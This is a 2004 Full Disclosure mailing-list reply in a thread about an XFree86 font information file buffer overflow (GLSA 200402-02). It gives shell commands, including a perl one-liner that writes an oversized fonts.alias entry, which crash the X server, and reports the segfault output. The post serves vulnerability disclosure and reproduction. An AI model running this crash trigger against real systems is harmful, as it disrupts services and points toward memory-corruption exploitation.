Full Disclosure mailing list archives
Re: [ GLSA 200402-02 ] XFree86 Font Information File Buffer Overflow
From: "Evert Daman" <linux () digipix org>
Date: Thu, 12 Feb 2004 08:45:51 +0100
To reproduce the overflow on the command line, you can run:
# cat > fonts.dir <<EOF
~ 1
~ word.bdf \
~ -misc-fixed-medium-r-semicondensed--13-120-75-75-c-60-iso8859-1
~ EOF
# perl -e 'print "0" x 1024 . "A" x 96 . "\n"' > fonts.alias
# X :0 -fp $PWD
{Some output removed}... Server aborting... Segmentation fault (core
dumped) mandrake gives me a: Fatal server error: Caught signal 11. Server aborting no segfault or something... kind regards, Evert _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [ GLSA 200402-02 ] XFree86 Font Information File Buffer Overflow Tim Yamin (Feb 11)
- Re: [ GLSA 200402-02 ] XFree86 Font Information File Buffer Overflow Evert Daman (Feb 12)
- Re: Re: [ GLSA 200402-02 ] XFree86 Font Information File Buffer Overflow qobaiashi (Feb 12)
- Re: Re: [ GLSA 200402-02 ] XFree86 Font Information File Buffer Overflow Evert Daman (Feb 12)
- Re: Re: [ GLSA 200402-02 ] XFree86 Font Information File Buffer Overflow Roman Drahtmueller (Feb 12)
- Re: Re: [ GLSA 200402-02 ] XFree86 Font Information File Buffer Overflow qobaiashi (Feb 12)
- Re: [ GLSA 200402-02 ] XFree86 Font Information File Buffer Overflow Evert Daman (Feb 12)